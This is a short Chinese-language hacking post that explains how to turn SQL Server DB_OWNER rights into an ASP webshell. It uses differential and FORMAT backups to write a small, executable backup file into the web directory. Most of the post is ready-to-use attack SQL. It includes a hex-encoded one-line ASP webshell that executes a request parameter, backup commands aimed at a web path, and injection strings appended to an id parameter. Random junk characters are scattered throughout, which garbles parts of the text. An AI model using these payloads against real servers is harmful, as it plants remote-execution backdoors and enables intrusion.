DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
/ o! }6 |5 u/ l5 z
4 B! P% D: i2 e减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
加一个参数WITH DIFFERENTIAL

/ F( `& P3 Y3 ~4 u1
2
3
: r1 H, v9 S; B% t- q; K4
- G- }# L& Y# |1 l! p7 ~ declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
+ K9 W% _& ?* y3 fcreate table [dbo].[xiaolu] ([cmd] [image]);
7 ^0 V1 p" r4 F" _" r! {insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
" Q" o6 r7 F) ?9 I# n8 E* J; Sdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

9 j. [6 z2 L( |  x7 h! H6 f- V% }8 G二利用完全FORMAT
9 H; D) j! b+ i7 b8 M加一个参数WITH FROMAT
有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

8 U8 X9 g0 a1 z1
. ?# w6 m6 F. a3 N" Z' T7 Z2
5 S5 d1 p7 p0 H) O. @3 D. o3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
2 z, E) @, D! ]( h( {8 d& ycreate table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
' N# v( ^( @( `7 P; ideclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

总的来说就是那么简单几句,下面以备份数据库model为例子
1
& c7 Z5 p! J$ M- s) z8 v
0 d( D( C1 ]7 m( k9 z: T1
1 z$ W: |5 n  W8 f id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
, j* j5 Z. H8 D+ c0 F) D
2
: O; E+ [) o+ e; J. ~
* c. K1 f8 q( X6 h1
id=1;backup database model to disk='你的路径‘ with differential,format;--
' l0 n, S5 [% t+ b1 x